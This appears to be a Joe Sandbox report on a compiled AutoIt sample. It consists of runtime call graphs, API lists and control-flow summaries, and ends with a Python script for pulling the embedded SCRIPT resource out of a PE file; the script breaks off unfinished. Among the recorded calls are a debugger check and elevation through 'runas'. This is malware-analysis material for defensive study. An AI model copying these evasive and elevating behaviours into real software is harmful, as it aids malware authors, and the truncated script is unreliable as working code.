8b07d4 99708->99703 99741 8aa06b InitializeCriticalSectionAndSpinCount 99708->99741 99709 8a9ed3 __mtinitlocknum 58 API calls 99709->99713 99712 8b07fa EnterCriticalSection 99712->99703 99713->99703 99713->99704 99713->99709 99738 8a6e8d 59 API calls __lock 99713->99738 99739 8a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99713->99739 99724 8b0877 __wopenfile 99715->99724 99716 8b0891 99746 8a8d68 58 API calls __getptd_noexit 99716->99746 99718 8b0a4c 99718->99716 99722 8b0aaf 99718->99722 99719 8b0896 99747 8a8ff6 9 API calls __mbstowcs_l_helper 99719->99747 99721 8a5540 99734 8a5562 LeaveCriticalSection LeaveCriticalSection _fprintf 99721->99734 99743 8b87f1 99722->99743 99724->99716 99724->99718 99724->99724 99748 8a3a0b 60 API calls 2 library calls 99724->99748 99726 8b0a45 99726->99718 99749 8a3a0b 60 API calls 2 library calls 99726->99749 99728 8b0a64 99728->99718 99750 8a3a0b 60 API calls 2 library calls 99728->99750 99730->99685 99731->99695 99732->99695 99733->99695 99734->99695 99742 8a9fb5 LeaveCriticalSection 99735->99742 99737 8b0855 99737->99707 99738->99713 99739->99713 99740->99708 99741->99712 99742->99737 99751 8b7fd5 99743->99751 99745 8b880a 99745->99721 99746->99719 99747->99721 99748->99726 99749->99728 99750->99718 99754 8b7fe1 __setmode 99751->99754 99752 8b7ff7 99836 8a8d68 58 API calls __getptd_noexit 99752->99836 99754->99752 99756 8b802d 99754->99756 99755 8b7ffc 99837 8a8ff6 9 API calls __mbstowcs_l_helper 99755->99837 99762 8b809e 99756->99762 99759 8b8049 99838 8b8072 LeaveCriticalSection __unlock_fhandle 99759->99838 99761 8b8006 __setmode 99761->99745 99763 8b80be 99762->99763 99764 8a471a __wsopen_nolock 58 API calls 99763->99764 99767 8b80da 99764->99767 99765 8a9006 __invoke_watson 8 API calls 99766 8b87f0 99765->99766 99768 8b7fd5 __wsopen_helper 103 API calls 99766->99768 99769 8b8114 99767->99769 99776 8b8137 99767->99776 99810 8b8211 99767->99810 99770 8b880a 99768->99770 99771 8a8d34 __chsize_nolock 58 API calls 
99769->99771 99770->99759 99772 8b8119 99771->99772 99773 8a8d68 __mbstowcs_l_helper 58 API calls 99772->99773 99774 8b8126 99773->99774 99777 8a8ff6 __mbstowcs_l_helper 9 API calls 99774->99777 99775 8b81f5 99778 8a8d34 __chsize_nolock 58 API calls 99775->99778 99776->99775 99783 8b81d3 99776->99783 99779 8b8130 99777->99779 99780 8b81fa 99778->99780 99779->99759 99781 8a8d68 __mbstowcs_l_helper 58 API calls 99780->99781 99782 8b8207 99781->99782 99784 8a8ff6 __mbstowcs_l_helper 9 API calls 99782->99784 99785 8ad4d4 __alloc_osfhnd 61 API calls 99783->99785 99784->99810 99786 8b82a1 99785->99786 99787 8b82ab 99786->99787 99788 8b82ce 99786->99788 99790 8a8d34 __chsize_nolock 58 API calls 99787->99790 99789 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99788->99789 99800 8b82f0 99789->99800 99791 8b82b0 99790->99791 99792 8a8d68 __mbstowcs_l_helper 58 API calls 99791->99792 99794 8b82ba 99792->99794 99793 8b836e GetFileType 99795 8b83bb 99793->99795 99796 8b8379 GetLastError 99793->99796 99798 8a8d68 __mbstowcs_l_helper 58 API calls 99794->99798 99807 8ad76a __set_osfhnd 59 API calls 99795->99807 99799 8a8d47 __dosmaperr 58 API calls 99796->99799 99797 8b833c GetLastError 99801 8a8d47 __dosmaperr 58 API calls 99797->99801 99798->99779 99802 8b83a0 CloseHandle 99799->99802 99800->99793 99800->99797 99803 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99800->99803 99804 8b8361 99801->99804 99802->99804 99805 8b83ae 99802->99805 99806 8b8331 99803->99806 99808 8a8d68 __mbstowcs_l_helper 58 API calls 99804->99808 99809 8a8d68 __mbstowcs_l_helper 58 API calls 99805->99809 99806->99793 99806->99797 99813 8b83d9 99807->99813 99808->99810 99811 8b83b3 99809->99811 99810->99765 99811->99804 99812 8b8594 99812->99810 99815 8b8767 CloseHandle 99812->99815 99813->99812 99814 8b1b11 __lseeki64_nolock 60 API calls 99813->99814 99833 8b845a 99813->99833 99816 8b8443 99814->99816 99817 8b7f4d ___createFile GetModuleHandleW GetProcAddress 
CreateFileW 99815->99817 99819 8a8d34 __chsize_nolock 58 API calls 99816->99819 99816->99833 99818 8b878e 99817->99818 99820 8b87c2 99818->99820 99821 8b8796 GetLastError 99818->99821 99819->99833 99820->99810 99822 8a8d47 __dosmaperr 58 API calls 99821->99822 99824 8b87a2 99822->99824 99823 8b848c 99827 8b99f2 __chsize_nolock 82 API calls 99823->99827 99823->99833 99828 8ad67d __free_osfhnd 59 API calls 99824->99828 99825 8b0d2d __close_nolock 61 API calls 99825->99833 99826 8b10ab 70 API calls __read_nolock 99826->99833 99827->99823 99828->99820 99829 8adac6 __write 78 API calls 99829->99833 99830 8b8611 99832 8b0d2d __close_nolock 61 API calls 99830->99832 99831 8b1b11 60 API calls __lseeki64_nolock 99831->99833 99834 8b8618 99832->99834 99833->99812 99833->99823 99833->99825 99833->99826 99833->99829 99833->99830 99833->99831 99835 8a8d68 __mbstowcs_l_helper 58 API calls 99834->99835 99835->99810 99836->99755 99837->99761 99838->99761 99840 884ce1 99839->99840 99841 884d9d LoadLibraryA 99839->99841 99840->99641 99840->99642 99841->99840 99842 884dae GetProcAddress 99841->99842 99842->99840 99844 885003 FindResourceExW 99843->99844 99848 885020 99843->99848 99845 8bdd5c LoadResource 99844->99845 99844->99848 99846 8bdd71 SizeofResource 99845->99846 99845->99848 99847 8bdd85 LockResource 99846->99847 99846->99848 99847->99848 99848->99650 99850 885054 99849->99850 99853 8bddd4 99849->99853 99855 8a5a7d 99850->99855 99852 885062 99852->99657 99854->99650 99858 8a5a89 __setmode 99855->99858 99856 8a5a9b 99868 8a8d68 58 API calls __getptd_noexit 99856->99868 99857 8a5ac1 99870 8a6e4e 99857->99870 99858->99856 99858->99857 99861 8a5aa0 99869 8a8ff6 9 API calls __mbstowcs_l_helper 99861->99869 99862 8a5ac7 99876 8a59ee 83 API calls 5 library calls 99862->99876 99865 8a5aab __setmode 99865->99852 99866 8a5ad6 99877 8a5af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99866->99877 99868->99861 99869->99865 99871 8a6e5e 99870->99871 99872 8a6e80 EnterCriticalSection 
99870->99872 99871->99872 99873 8a6e66 99871->99873 99874 8a6e76 99872->99874 99875 8a9e4b __lock 58 API calls 99873->99875 99874->99862 99875->99874 99876->99866 99877->99865 99881 8a582d 99878->99881 99880 88508e 99880->99669 99882 8a5839 __setmode 99881->99882 99883 8a584f _memset 99882->99883 99884 8a587c 99882->99884 99885 8a5874 __setmode 99882->99885 99908 8a8d68 58 API calls __getptd_noexit 99883->99908 99886 8a6e4e __lock_file 59 API calls 99884->99886 99885->99880 99888 8a5882 99886->99888 99894 8a564d 99888->99894 99889 8a5869 99909 8a8ff6 9 API calls __mbstowcs_l_helper 99889->99909 99895 8a5683 99894->99895 99898 8a5668 _memset 99894->99898 99910 8a58b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99895->99910 99896 8a5673 100006 8a8d68 58 API calls __getptd_noexit 99896->100006 99898->99895 99898->99896 99901 8a56c3 99898->99901 99901->99895 99902 8a57d4 _memset 99901->99902 99911 8a4916 99901->99911 99918 8b10ab 99901->99918 99986 8b0df7 99901->99986 100008 8b0f18 58 API calls 3 library calls 99901->100008 100009 8a8d68 58 API calls __getptd_noexit 99902->100009 99907 8a5678 100007 8a8ff6 9 API calls __mbstowcs_l_helper 99907->100007 99908->99889 99909->99885 99910->99885 99912 8a4920 99911->99912 99913 8a4935 99911->99913 100010 8a8d68 58 API calls __getptd_noexit 99912->100010 99913->99901 99915 8a4925 100011 8a8ff6 9 API calls __mbstowcs_l_helper 99915->100011 99917 8a4930 99917->99901 99919 8b10cc 99918->99919 99920 8b10e3 99918->99920 100021 8a8d34 58 API calls __getptd_noexit 99919->100021 99922 8b181b 99920->99922 99927 8b111d 99920->99927 100037 8a8d34 58 API calls __getptd_noexit 99922->100037 99924 8b10d1 100022 8a8d68 58 API calls __getptd_noexit 99924->100022 99925 8b1820 100038 8a8d68 58 API calls __getptd_noexit 99925->100038 99929 8b1125 99927->99929 99934 8b113c 99927->99934 100023 8a8d34 58 API calls __getptd_noexit 99929->100023 99931 8b1131 100039 8a8ff6 9 API calls __mbstowcs_l_helper 99931->100039 99932 8b112a 100024 8a8d68 
58 API calls __getptd_noexit 99932->100024 99935 8b1151 99934->99935 99938 8b116b 99934->99938 99939 8b1189 99934->99939 99966 8b10d8 99934->99966 100025 8a8d34 58 API calls __getptd_noexit 99935->100025 99938->99935 99941 8b1176 99938->99941 100026 8a8a5d 58 API calls 2 library calls 99939->100026 100012 8b5ebb 99941->100012 99942 8b1199 99944 8b11bc 99942->99944 99945 8b11a1 99942->99945 100029 8b1b11 60 API calls 3 library calls 99944->100029 100027 8a8d68 58 API calls __getptd_noexit 99945->100027 99946 8b128a 99948 8b1303 ReadFile 99946->99948 99953 8b12a0 GetConsoleMode 99946->99953 99951 8b17e3 GetLastError 99948->99951 99952 8b1325 99948->99952 99950 8b11a6 100028 8a8d34 58 API calls __getptd_noexit 99950->100028 99955 8b17f0 99951->99955 99956 8b12e3 99951->99956 99952->99951 99960 8b12f5 99952->99960 99957 8b1300 99953->99957 99958 8b12b4 99953->99958 100035 8a8d68 58 API calls __getptd_noexit 99955->100035 99967 8b12e9 99956->99967 100030 8a8d47 58 API calls 3 library calls 99956->100030 99957->99948 99958->99957 99961 8b12ba ReadConsoleW 99958->99961 99960->99967 99969 8b15c7 99960->99969 99970 8b135a 99960->99970 99961->99960 99964 8b12dd GetLastError 99961->99964 99963 8b17f5 100036 8a8d34 58 API calls __getptd_noexit 99963->100036 99964->99956 99966->99901 99967->99966 99968 8a2f95 _free 58 API calls 99967->99968 99968->99966 99969->99967 99977 8b16cd ReadFile 99969->99977 99971 8b1447 99970->99971 99973 8b13c6 ReadFile 99970->99973 99971->99967 99975 8b1504 99971->99975 99976 8b14f4 99971->99976 99980 8b14b4 MultiByteToWideChar 99971->99980 99974 8b13e7 GetLastError 99973->99974 99982 8b13f1 99973->99982 99974->99982 99975->99980 100033 8b1b11 60 API calls 3 library calls 99975->100033 100032 8a8d68 58 API calls __getptd_noexit 99976->100032 99978 8b16f0 GetLastError 99977->99978 99985 8b16fe 99977->99985 99978->99985 99980->99964 99980->99967 99982->99970 100031 8b1b11 60 API calls 3 library calls 99982->100031 99985->99969 100034 8b1b11 60 API 
calls 3 library calls 99985->100034 99987 8b0e02 99986->99987 99991 8b0e17 99986->99991 100073 8a8d68 58 API calls __getptd_noexit 99987->100073 99989 8b0e07 100074 8a8ff6 9 API calls __mbstowcs_l_helper 99989->100074 99992 8b0e4c 99991->99992 99997 8b0e12 99991->99997 100075 8b6234 58 API calls __malloc_crt 99991->100075 99994 8a4916 __stbuf 58 API calls 99992->99994 99995 8b0e60 99994->99995 100040 8b0f97 99995->100040 99997->99901 99998 8b0e67 99998->99997 99999 8a4916 __stbuf 58 API calls 99998->99999 100000 8b0e8a 99999->100000 100000->99997 100001 8a4916 __stbuf 58 API calls 100000->100001 100002 8b0e96 100001->100002 100002->99997 100003 8a4916 __stbuf 58 API calls 100002->100003 100004 8b0ea3 100003->100004 100005 8a4916 __stbuf 58 API calls 100004->100005 100005->99997 100006->99907 100007->99895 100008->99901 100009->99907 100010->99915 100011->99917 100013 8b5ec6 100012->100013 100015 8b5ed3 100012->100015 100014 8a8d68 __mbstowcs_l_helper 58 API calls 100013->100014 100016 8b5ecb 100014->100016 100017 8b5edf 100015->100017 100018 8a8d68 __mbstowcs_l_helper 58 API calls 100015->100018 100016->99946 100017->99946 100019 8b5f00 100018->100019 100020 8a8ff6 __mbstowcs_l_helper 9 API calls 100019->100020 100020->100016 100021->99924 100022->99966 100023->99932 100024->99931 100025->99932 100026->99942 100027->99950 100028->99966 100029->99941 100030->99967 100031->99982 100032->99967 100033->99980 100034->99985 100035->99963 100036->99967 100037->99925 100038->99931 100039->99966 100041 8b0fa3 __setmode 100040->100041 100042 8b0fb0 100041->100042 100043 8b0fc7 100041->100043 100045 8a8d34 __chsize_nolock 58 API calls 100042->100045 100044 8b108b 100043->100044 100046 8b0fdb 100043->100046 100047 8a8d34 __chsize_nolock 58 API calls 100044->100047 100048 8b0fb5 100045->100048 100049 8b0ff9 100046->100049 100050 8b1006 100046->100050 100051 8b0ffe 100047->100051 100052 8a8d68 __mbstowcs_l_helper 58 API calls 100048->100052 100053 8a8d34 __chsize_nolock 58 API 
calls 100049->100053 100054 8b1028 100050->100054 100055 8b1013 100050->100055 100058 8a8d68 __mbstowcs_l_helper 58 API calls 100051->100058 100067 8b0fbc __setmode 100052->100067 100053->100051 100057 8ad446 ___lock_fhandle 59 API calls 100054->100057 100056 8a8d34 __chsize_nolock 58 API calls 100055->100056 100059 8b1018 100056->100059 100060 8b102e 100057->100060 100061 8b1020 100058->100061 100062 8a8d68 __mbstowcs_l_helper 58 API calls 100059->100062 100063 8b1041 100060->100063 100064 8b1054 100060->100064 100065 8a8ff6 __mbstowcs_l_helper 9 API calls 100061->100065 100062->100061 100068 8b10ab __read_nolock 70 API calls 100063->100068 100066 8a8d68 __mbstowcs_l_helper 58 API calls 100064->100066 100065->100067 100070 8b1059 100066->100070 100067->99998 100069 8b104d 100068->100069 100072 8b1083 __read LeaveCriticalSection 100069->100072 100071 8a8d34 __chsize_nolock 58 API calls 100070->100071 100071->100069 100072->100067 100073->99989 100074->99997 100075->99992 100079 8a543a GetSystemTimeAsFileTime 100076->100079 100078 8e91f8 100078->99671 100080 8a5468 __aulldiv 100079->100080 100080->100078 100082 8a5e9c __setmode 100081->100082 100083 8a5eae 100082->100083 100084 8a5ec3 100082->100084 100095 8a8d68 58 API calls __getptd_noexit 100083->100095 100086 8a6e4e __lock_file 59 API calls 100084->100086 100088 8a5ec9 100086->100088 100087 8a5eb3 100096 8a8ff6 9 API calls __mbstowcs_l_helper 100087->100096 100097 8a5b00 67 API calls 6 library calls 100088->100097 100091 8a5ed4 100098 8a5ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 100091->100098 100092 8a5ebe __setmode 100092->99676 100094 8a5ee6 100094->100092 100095->100087 100096->100092 100097->100091 100098->100094 100100 8880fa _memmove 100099->100100 100101 8880e7 100099->100101 100100->99538 100101->100100 100102 8a0ff6 Mailbox 59 API calls 100101->100102 100102->100100 100103->99547 100104->99561 100105->99563 100106->99560 100107->99568 100109 8892c9 Mailbox 100108->100109 100110 8bf5c8 
100109->100110 100114 8892d3 100109->100114 100111 8a0ff6 Mailbox 59 API calls 100110->100111 100113 8bf5d4 100111->100113 100112 8892da 100112->99573 100114->100112 100116 889df0 100114->100116 100118 889dfb 100116->100118 100117 889e32 100117->100114 100118->100117 100121 888e34 59 API calls Mailbox 100118->100121 100120 889e5d 100120->100114 100121->100120 100122->99579 100123->99577 100126 8e99d2 _wcscmp _W_expandtime 100124->100126 100125 88506b 74 API calls 100125->100126 100126->100125 100127 8e9393 GetSystemTimeAsFileTime 100126->100127 100128 8e9866 100126->100128 100129 885045 85 API calls 100126->100129 100127->100126 100128->99589 100128->99616 100129->100126 100131 8e8da9 100130->100131 100132 8e8d9b 100130->100132 100134 8e8dee 100131->100134 100135 8a548b 115 API calls 100131->100135 100145 8e8db2 100131->100145 100133 8a548b 115 API calls 100132->100133 100133->100131 100161 8e901b 100134->100161 100137 8e8dd3 100135->100137 100137->100134 100138 8e8ddc 100137->100138 100142 8a55d6 __fcloseall 83 API calls 100138->100142 100138->100145 100139 8e8e32 100140 8e8e36 100139->100140 100141 8e8e57 100139->100141 100144 8e8e43 100140->100144 100147 8a55d6 __fcloseall 83 API calls 100140->100147 100165 8e8c33 100141->100165 100142->100145 100144->100145 100150 8a55d6 __fcloseall 83 API calls 100144->100150 100145->99618 100147->100144 100148 8e8e85 100174 8e8eb5 100148->100174 100149 8e8e65 100153 8a55d6 __fcloseall 83 API calls 100149->100153 100154 8e8e72 100149->100154 100150->100145 100153->100154 100154->100145 100156 8a55d6 __fcloseall 83 API calls 100154->100156 100156->100145 100158 8e8ea0 100158->100145 100160 8a55d6 __fcloseall 83 API calls 100158->100160 100160->100145 100162 8e9040 100161->100162 100164 8e9029 _memmove _W_expandtime 100161->100164 100163 8a5812 __fread_nolock 74 API calls 100162->100163 100163->100164 100164->100139 100166 8a594c _W_store_winword 58 API calls 100165->100166 100167 8e8c42 100166->100167 100168 8a594c 


                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                              • IsDebuggerPresent.KERNEL32 ref: 00883B8C
                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 00890A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C26,009462F8,?,?,?), ref: 00890ACE
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009393F0,00000010), ref: 008BD4BC
                              • SetCurrentDirectoryW.KERNEL32(?,009462F8,?,?,?), ref: 008BD4F4
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00935D40,009462F8,?,?,?), ref: 008BD57A
                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD581
                                • Part of subcall function 00883A58: GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                • Part of subcall function 00883A58: LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                • Part of subcall function 00883A58: LoadIconW.USER32(00000063), ref: 00883A88
                                • Part of subcall function 00883A58: LoadIconW.USER32(000000A4), ref: 00883A9A
                                • Part of subcall function 00883A58: LoadIconW.USER32(000000A2), ref: 00883AAC
                                • Part of subcall function 00883A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                • Part of subcall function 00883A58: RegisterClassExW.USER32(?), ref: 00883B28
                                • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                • Part of subcall function 008839E7: ShowWindow.USER32(00000000,?,?), ref: 00883A4A
                                • Part of subcall function 008839E7: ShowWindow.USER32(00000000,?,?), ref: 00883A53
                                • Part of subcall function 008843DB: _memset.LIBCMT ref: 00884401
                                • Part of subcall function 008843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                              Strings
                              • runas, xrefs: 008BD575
                              • This is a third-party compiled AutoIt script., xrefs: 008BD4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                              • String ID: This is a third-party compiled AutoIt script.$runas
                              • API String ID: 529118366-3287110873
                              • Opcode ID: 78e9125ede460867ccbb8c27f4f29261bc471430985893ed4aad3987f4e097fb
                              • Instruction ID: 4c6c1791734bafb2091e6875fdf8e64732a7af2dabcc0b593d81b2984bcc70f9
                              • Opcode Fuzzy Hash: 78e9125ede460867ccbb8c27f4f29261bc471430985893ed4aad3987f4e097fb
                              • Instruction Fuzzy Hash: B05104B5A08249BFCF21BBB8DC15EED7B75FB46704B004065F461E22A1DAB09605EB23

                               Control-flow Graph

Control-flow graph of 884afe (edge list omitted; the executed/not-executed colouring of the original image is not recoverable from the text). Main path: 884afe-884b5e (call 8877c7, GetVersionExW, call 887d2c) -> 884b64 -> 884b67-884b6c -> 884b72/884c70 -> 884b73-884baa (call 887e8c, call 887886) -> 884bb0-884be8 -> 884bf1-884c08 (GetCurrentProcess, IsWow64Process) -> 884c0d-884c1e -> either 884c89-884c93 (GetSystemInfo) -> 884c56-884c66, or 884c20-884c30 (call 884c95) -> 884c32-884c3f (call 884c95) -> 884c41-884c45 (GetNativeSystemInfo) or 884c76-884c7b / 884c7d-884c87 (GetSystemInfo) -> 884c47-884c4b -> 884c4d-884c50 (FreeLibrary) -> 884c56-884c66. The 8bdb90-8bdcbd blocks are out-of-line branches: 8bdbb2-8bdbb7 returns to 884b67, and most of 8bdbd4-8bdc88 returns to 884bf1.
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 00884B2B
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884BF8
                              • IsWow64Process.KERNEL32(00000000), ref: 00884BFF
                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00884C45
                              • FreeLibrary.KERNEL32(00000000), ref: 00884C50
                              • GetSystemInfo.KERNEL32(00000000), ref: 00884C81
                              • GetSystemInfo.KERNEL32(00000000), ref: 00884C8D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                              • String ID:
                              • API String ID: 1986165174-0
                              • Opcode ID: a6d011c72c7da3d2c8c43010cd92129f42501fccf51ff784ed4f6c0f366f4935
                              • Instruction ID: fad6916b993999c5e6e691e07ff9bc649d639e2e9988dc5e4c6ec0b6da844923
                              • Opcode Fuzzy Hash: a6d011c72c7da3d2c8c43010cd92129f42501fccf51ff784ed4f6c0f366f4935
                              • Instruction Fuzzy Hash: C691C43254EBC5DEC731DB6884611AABFE5FF26310B58495ED0CAC3B01D234E908D719

                               Control-flow Graph

Control-flow graph of 884fe9 (edge list omitted). 884fe9-885001 (CreateStreamOnHGlobal) -> 885003-88501a (FindResourceExW) -> 8bdd5c-8bdd6b (LoadResource) -> 8bdd71-8bdd7f (SizeofResource) -> 8bdd85-8bdd90 (LockResource) -> 8bdd96-8bddb4 -> 885020. The other edge out of each of these steps also lands on 885020, which leads to 885021-885026; a failed CreateStreamOnHGlobal goes to 885021-885026 directly.
                              APIs
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00884EEE,?,?,00000000,00000000), ref: 00884FF9
                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884EEE,?,?,00000000,00000000), ref: 00885010
                              • LoadResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD60
                              • SizeofResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD75
                              • LockResource.KERNEL32(00884EEE,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F,00000000), ref: 008BDD88
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                              • String ID: SCRIPT
                              • API String ID: 3051347437-3967369404
                              • Opcode ID: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                              • Instruction ID: 0abcacc66ccd3473931b032a7eb0ee8fe620690d6c23c6398ee182826cbc15c0
                              • Opcode Fuzzy Hash: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                              • Instruction Fuzzy Hash: F4119A75200B00BFD7319B69DC68F677BB9FBC9B11F208168F416C6660DB61E8009660
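The five calls in the block above are the AutoIt3 runtime locating its compiled script: FindResourceExW asks for resource type 0x0A (RT_RCDATA) with the name SCRIPT, the resource is loaded, sized and locked, and an IStream from CreateStreamOnHGlobal is set up alongside it. The same bytes are reachable statically, which is how a practitioner gets at the embedded script without executing the sample. The Python below is an added example, not code from this report or from Joe Sandbox: it walks the PE resource tree (type -> name -> language) the way FindResourceExW does and returns the RCDATA/SCRIPT blob. The build_sample_pe() helper fabricates a minimal PE so the example runs offline; the AU3!EA06 prefix in the constructed payload is an assumption about AutoIt's script header, not something this report shows.

```python
import struct

RT_RCDATA = 10  # resource type 0x0A, the value passed to FindResourceExW above


def _dir_entries(rsrc: bytes, off: int):
    """Yield (name_or_id, offset_field) pairs of the IMAGE_RESOURCE_DIRECTORY at off."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    for i in range(n_named + n_id):
        yield struct.unpack_from("<II", rsrc, off + 16 + 8 * i)


def _entry_name(rsrc: bytes, ident: int):
    """Resolve an entry's Name field: an integer ID, or (high bit set) a UTF-16 string."""
    if ident & 0x80000000:
        off = ident & 0x7FFFFFFF
        length = struct.unpack_from("<H", rsrc, off)[0]
        return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le").upper()
    return ident


def find_resource(rsrc: bytes, rsrc_rva: int, res_type, res_name):
    """Walk type -> name -> language and return the first matching data blob, or None."""
    if isinstance(res_name, str):
        res_name = res_name.upper()  # FindResourceExW matches names case-insensitively
    for type_id, off1 in _dir_entries(rsrc, 0):
        if _entry_name(rsrc, type_id) != res_type or not off1 & 0x80000000:
            continue
        for name_id, off2 in _dir_entries(rsrc, off1 & 0x7FFFFFFF):
            if _entry_name(rsrc, name_id) != res_name or not off2 & 0x80000000:
                continue
            for _lang, off3 in _dir_entries(rsrc, off2 & 0x7FFFFFFF):
                if off3 & 0x80000000:
                    continue  # a fourth directory level is malformed; skip it
                data_rva, size = struct.unpack_from("<II", rsrc, off3)
                start = data_rva - rsrc_rva  # the data entry holds an RVA, not a file offset
                return rsrc[start:start + size]
    return None


def extract_script_resource(pe: bytes):
    """Find the .rsrc section of an on-disk PE image and pull RCDATA/"SCRIPT" out of it."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    sec_table = e_lfanew + 24 + opt_size
    for i in range(n_sections):
        name, _vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, sec_table + 40 * i)
        if name.rstrip(b"\0") == b".rsrc":
            return find_resource(pe[raw_ptr:raw_ptr + raw_size], va, RT_RCDATA, "SCRIPT")
    return None


def build_sample_pe(payload: bytes, rsrc_rva: int = 0x3000) -> bytes:
    """Constructed stand-in: a minimal PE whose only section is .rsrc holding RCDATA/"SCRIPT".

    Test scaffolding only, not an AutoIt binary; it exists so the extractor runs offline."""
    name = "SCRIPT".encode("utf-16-le")
    r = bytearray()
    r += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)                   # root dir: one ID entry (the type)
    r += struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)           # RCDATA -> subdirectory at 0x18
    r += struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0)                   # type dir: one named entry
    r += struct.pack("<II", 0x80000000 | 0x58, 0x80000000 | 0x30)   # "SCRIPT" (string at 0x58) -> dir at 0x30
    r += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)                   # name dir: one language entry
    r += struct.pack("<II", 0x0409, 0x48)                           # lang 0x409 -> data entry at 0x48
    r += struct.pack("<IIII", rsrc_rva + 0x68, len(payload), 0, 0)  # IMAGE_RESOURCE_DATA_ENTRY
    r += struct.pack("<H", len("SCRIPT")) + name                    # IMAGE_RESOURCE_DIR_STRING_U
    r += b"\0" * (0x68 - len(r))
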